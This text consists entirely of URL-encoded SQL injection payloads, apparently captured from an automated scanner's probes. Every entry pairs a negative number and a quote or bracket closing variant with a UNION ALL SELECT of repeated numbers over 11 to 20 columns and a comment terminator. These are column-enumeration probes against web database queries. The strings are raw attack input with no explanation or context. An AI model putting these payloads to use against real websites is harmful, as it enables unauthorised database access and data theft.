-2636%22%20UNION%20ALL%20SELECT%207426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426--%20 -6490%22%20UNION%20ALL%20SELECT%208363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363%2C8363--%20 -3718%22%20UNION%20ALL%20SELECT%205379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379%2C5379--%20 -7972%29%20UNION%20ALL%20SELECT%207331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331--%20 -4876%29%20UNION%20ALL%20SELECT%204626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626%2C4626--%20 -7903%29%20UNION%20ALL%20SELECT%204993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993%2C4993--%20 -3148%29%20UNION%20ALL%20SELECT%201513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513%2C1513--%20 -7576%29%20UNION%20ALL%20SELECT%207395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395--%20 -7732%29%20UNION%20ALL%20SELECT%201922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922--%20 -9617%29%20UNION%20ALL%20SELECT%208157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157%2C8157--%20 -3711%29%20UNION%20ALL%20SELECT%202013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013%2C2013--%20 -8658%29%20UNION%20ALL%20SELECT%201250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250%2C1250--%20 -1263%29%20UNION%20ALL%20SELECT%204675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675--%20 -1405%29%29%20UNION%20ALL%20SELECT%203453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453--%20 -8322%29%29%20UNION%20ALL%20SELECT%207725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725%2C7725--%20 -6523%29%29%20UNION%20ALL%20SELECT%202187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187%2C2187--%20 -9079%29%29%20UNION%20ALL%20SELECT%203233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233%2C3233--%20 -4048%29%29%20UNION%20ALL%20SELECT%209863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863--%20 -3216%29%29%20UNION%20ALL%20SELECT%204172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172--%20 -9504%29%29%20UNION%20ALL%20SELECT%201096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096%2C1096--%20 -2631%29%29%20UNION%20ALL%20SELECT%203100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100%2C3100--%20 -6520%29%29%20UNION%20ALL%20SELECT%206639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639--%20 -5731%29%29%20UNION%20ALL%20SELECT%203068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068%2C3068--%20 -8583%29%29%29%20UNION%20ALL%20SELECT%204335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335%2C4335--%20 -9240%29%29%29%20UNION%20ALL%20SELECT%201903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903%2C1903--%20 -3204%29%29%29%20UNION%20ALL%20SELECT%205769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769%2C5769--%20 -4883%29%29%29%20UNION%20ALL%20SELECT%204287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287--%20 -9878%29%29%29%20UNION%20ALL%20SELECT%201424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424%2C1424--%20 -1930%29%29%29%20UNION%20ALL%20SELECT%204745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745%2C4745--%20 -8674%29%29%29%20UNION%20ALL%20SELECT%209801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801%2C9801--%20 -3643%29%29%29%20UNION%20ALL%20SELECT%207278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278%2C7278--%20 -6498%29%29%29%20UNION%20ALL%20SELECT%203215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215--%20 -4538%29%29%29%20UNION%20ALL%20SELECT%205984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984%2C5984--%20 -7921%20UNION%20ALL%20SELECT%205915%2C5915%2C5915%2C5915%2C5915%2C5915%2C5915%2C5915%2C5915%2C5915%2C5915--%20 -9750%20UNION%20ALL%20SELECT%201280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280%2C1280--%20 -3929%20UNION%20ALL%20SELECT%204635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635%2C4635--%20 -8601%20UNION%20ALL%20SELECT%202977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977--%20 -6412%20UNION%20ALL%20SELECT%204566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566%2C4566--%20 -7184%20UNION%20ALL%20SELECT%202981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981--%20 -9285%20UNION%20ALL%20SELECT%201787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787--%20 -5481%20UNION%20ALL%20SELECT%206538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538%2C6538--%20 -3781%20UNION%20ALL%20SELECT%209282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282%2C9282--%20 -2382%20UNION%20ALL%20SELECT%204787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787%2C4787--%20 -9421%27%29%20UNION%20ALL%20SELECT%203648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648--%20 -2998%27%29%20UNION%20ALL%20SELECT%208915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915%2C8915--%20 -1371%27%29%20UNION%20ALL%20SELECT%202967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967%2C2967--%20 -1339%27%29%20UNION%20ALL%20SELECT%208799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799--%20 -4120%27%29%20UNION%20ALL%20SELECT%206872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872--%20 -7076%27%29%20UNION%20ALL%20SELECT%202091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091%2C2091--%20 -5662%27%29%20UNION%20ALL%20SELECT%203031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031--%20 -1385%27%29%20UNION%20ALL%20SELECT%201193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193%2C1193--%20 -6714%27%29%20UNION%20ALL%20SELECT%207708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708--%20 -7777%27%29%20UNION%20ALL%20SELECT%201312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312%2C1312--%20 -5048%27%29%29%20UNION%20ALL%20SELECT%205291%2C5291%2C5291%2C5291%2C5291%2C5291%2C5291%2C5291%2C5291%2C5291%2C5291--%20 -4101%27%29%29%20UNION%20ALL%20SELECT%201111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111%2C1111--%20 -8155%27%29%29%20UNION%20ALL%20SELECT%207924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924--%20 -6432%27%29%29%20UNION%20ALL%20SELECT%204122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122%2C4122--%20 -1450%27%29%29%20UNION%20ALL%20SELECT%201127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127--%20 -1430%27%29%29%20UNION%20ALL%20SELECT%206683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683--%20 -4671%27%29%29%20UNION%20ALL%20SELECT%201248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248%2C1248--%20 -1563%27%29%29%20UNION%20ALL%20SELECT%201808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808%2C1808--%20 -9380%27%29%29%20UNION%20ALL%20SELECT%209727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727%2C9727--%20 -4403%27%29%29%20UNION%20ALL%20SELECT%208553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553%2C8553--%20 -3853%27%29%29%29%20UNION%20ALL%20SELECT%204971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971--%20 -4428%27%29%29%29%20UNION%20ALL%20SELECT%206181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181%2C6181--%20 -8755%27%29%29%29%20UNION%20ALL%20SELECT%205474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474%2C5474--%20 -8943%27%29%29%29%20UNION%20ALL%20SELECT%201151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151%2C1151--%20 -3344%27%29%29%29%20UNION%20ALL%20SELECT%203557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557%2C3557--%20 -8433%27%29%29%29%20UNION%20ALL%20SELECT%206007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007--%20 -7030%27%29%29%29%20UNION%20ALL%20SELECT%205605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605--%20 -8656%27%29%29%29%20UNION%20ALL%20SELECT%209761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761%2C9761--%20 -5647%27%29%29%29%20UNION%20ALL%20SELECT%209717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717--%20 -3799%27%29%29%29%20UNION%20ALL%20SELECT%205202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202--%20 -6414%27%20UNION%20ALL%20SELECT%205452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452%2C5452--%20 -8216%27%20UNION%20ALL%20SELECT%206132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132--%20 -2824%27%20UNION%20ALL%20SELECT%208286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286--%20 -7060%27%20UNION%20ALL%20SELECT%206462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462%2C6462--%20 -1978%27%20UNION%20ALL%20SELECT%204758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758--%20 -7987%27%20UNION%20ALL%20SELECT%209922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922--%20 -9231%27%20UNION%20ALL%20SELECT%208148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148%2C8148--%20 -1402%27%20UNION%20ALL%20SELECT%206341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341%2C6341--%20 -3112%27%20UNION%20ALL%20SELECT%203290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290%2C3290--%20 -5057%27%20UNION%20ALL%20SELECT%201629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629--%20 -1028%27%29%20UNION%20ALL%20SELECT%203662%2C3662%2C3662%2C3662%2C3662%2C3662%2C3662%2C3662%2C3662%2C3662%2C3662--%20 -6713%27%29%20UNION%20ALL%20SELECT%201152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152%2C1152--%20 -6846%27%29%20UNION%20ALL%20SELECT%205184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184%2C5184--%20 -7370%27%29%20UNION%20ALL%20SELECT%208408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408%2C8408--%20 -8222%27%29%20UNION%20ALL%20SELECT%201963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963%2C1963--%20 -7705%27%29%20UNION%20ALL%20SELECT%207945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945%2C7945--%20 -7469%27%29%20UNION%20ALL%20SELECT%208890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890%2C8890--%20 -4638%27%29%20UNION%20ALL%20SELECT%206423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423%2C6423--%20 -2710%27%29%20UNION%20ALL%20SELECT%207498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498%2C7498--%20 -7329%27%29%20UNION%20ALL%20SELECT%204713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713%2C4713--%20 -4080%27%29%29%20UNION%20ALL%20SELECT%201922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922--%20 -4659%27%29%29%20UNION%20ALL%20SELECT%204386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386--%20 -2294%27%29%29%20UNION%20ALL%20SELECT%203606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606%2C3606--%20 -8567%27%29%29%20UNION%20ALL%20SELECT%205464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464--%20 -6738%27%29%29%20UNION%20ALL%20SELECT%203956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956--%20 -4253%27%29%29%20UNION%20ALL%20SELECT%209252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252%2C9252--%20 -7380%27%29%29%20UNION%20ALL%20SELECT%202184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184%2C2184--%20 -8321%27%29%29%20UNION%20ALL%20SELECT%206504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504%2C6504--%20 -9635%27%29%29%20UNION%20ALL%20SELECT%205102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102%2C5102--%20 -5428%27%29%29%20UNION%20ALL%20SELECT%208706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706%2C8706--%20 -7638%27%29%29%29%20UNION%20ALL%20SELECT%206646%2C6646%2C6646%2C6646%2C6646%2C6646%2C6646%2C6646%2C6646%2C6646%2C6646--%20 -6924%27%29%29%29%20UNION%20ALL%20SELECT%207064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064--%20 -3340%27%29%29%29%20UNION%20ALL%20SELECT%207675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675%2C7675--%20 -4103%27%29%29%29%20UNION%20ALL%20SELECT%203329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329%2C3329--%20 -6528%27%29%29%29%20UNION%20ALL%20SELECT%209295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295%2C9295--%20 -9282%27%29%29%29%20UNION%20ALL%20SELECT%208130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130--%20 -1030%27%29%29%29%20UNION%20ALL%20SELECT%205607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607%2C5607--%20 -6629%27%29%29%29%20UNION%20ALL%20SELECT%204813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813%2C4813--%20 -5568%27%29%29%29%20UNION%20ALL%20SELECT%202628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628%2C2628--%20 -3703%27%29%29%29%20UNION%20ALL%20SELECT%205591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591%2C5591--%20 -1067%27%20UNION%20ALL%20SELECT%201691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691%2C1691--%20 -8214%27%20UNION%20ALL%20SELECT%203135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135--%20 -3427%27%20UNION%20ALL%20SELECT%208886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886--%20 -3486%27%20UNION%20ALL%20SELECT%204545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545--%20 -4027%27%20UNION%20ALL%20SELECT%207651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651--%20 -3222%27%20UNION%20ALL%20SELECT%204451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451%2C4451--%20 -4032%27%20UNION%20ALL%20SELECT%203221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221%2C3221--%20 -9025%27%20UNION%20ALL%20SELECT%205265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265%2C5265--%20 -3163%27%20UNION%20ALL%20SELECT%202675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675%2C2675--%20 -5430%27%20UNION%20ALL%20SELECT%208474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474%2C8474--%20 -6132%22%29%20UNION%20ALL%20SELECT%204640%2C4640%2C4640%2C4640%2C4640%2C4640%2C4640%2C4640%2C4640%2C4640%2C4640--%20 -6788%22%29%20UNION%20ALL%20SELECT%205372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372%2C5372--%20 -3280%22%29%20UNION%20ALL%20SELECT%202929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929%2C2929--%20 -5454%22%29%20UNION%20ALL%20SELECT%206814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814%2C6814--%20 -8910%22%29%20UNION%20ALL%20SELECT%201261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261%2C1261--%20 -9507%22%29%20UNION%20ALL%20SELECT%204582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582%2C4582--%20 -7231%22%29%20UNION%20ALL%20SELECT%203314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314--%20 -3222%22%29%20UNION%20ALL%20SELECT%208950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950%2C8950--%20 -9982%22%29%20UNION%20ALL%20SELECT%208028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028--%20 -5659%22%29%20UNION%20ALL%20SELECT%208131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131%2C8131--%20 -2756%22%29%29%20UNION%20ALL%20SELECT%202624%2C2624%2C2624%2C2624%2C2624%2C2624%2C2624%2C2624%2C2624%2C2624%2C2624--%20 -8807%22%29%29%20UNION%20ALL%20SELECT%205421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421%2C5421--%20 -1375%22%29%29%20UNION%20ALL%20SELECT%203909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909%2C3909--%20 -5999%22%29%29%20UNION%20ALL%20SELECT%208049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049%2C8049--%20 -7917%22%29%29%20UNION%20ALL%20SELECT%203193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193%2C3193--%20 -7537%22%29%29%20UNION%20ALL%20SELECT%207238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238--%20 -9257%22%29%29%20UNION%20ALL%20SELECT%207600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600%2C7600--%20 -5063%22%29%29%20UNION%20ALL%20SELECT%208620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620--%20 -7618%22%29%29%20UNION%20ALL%20SELECT%209268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268--%20 -9280%22%29%29%20UNION%20ALL%20SELECT%206845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845%2C6845--%20 -8471%22%29%29%29%20UNION%20ALL%20SELECT%207225%2C7225%2C7225%2C7225%2C7225%2C7225%2C7225%2C7225%2C7225%2C7225%2C7225--%20 -5623%22%29%29%29%20UNION%20ALL%20SELECT%206191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191%2C6191--%20 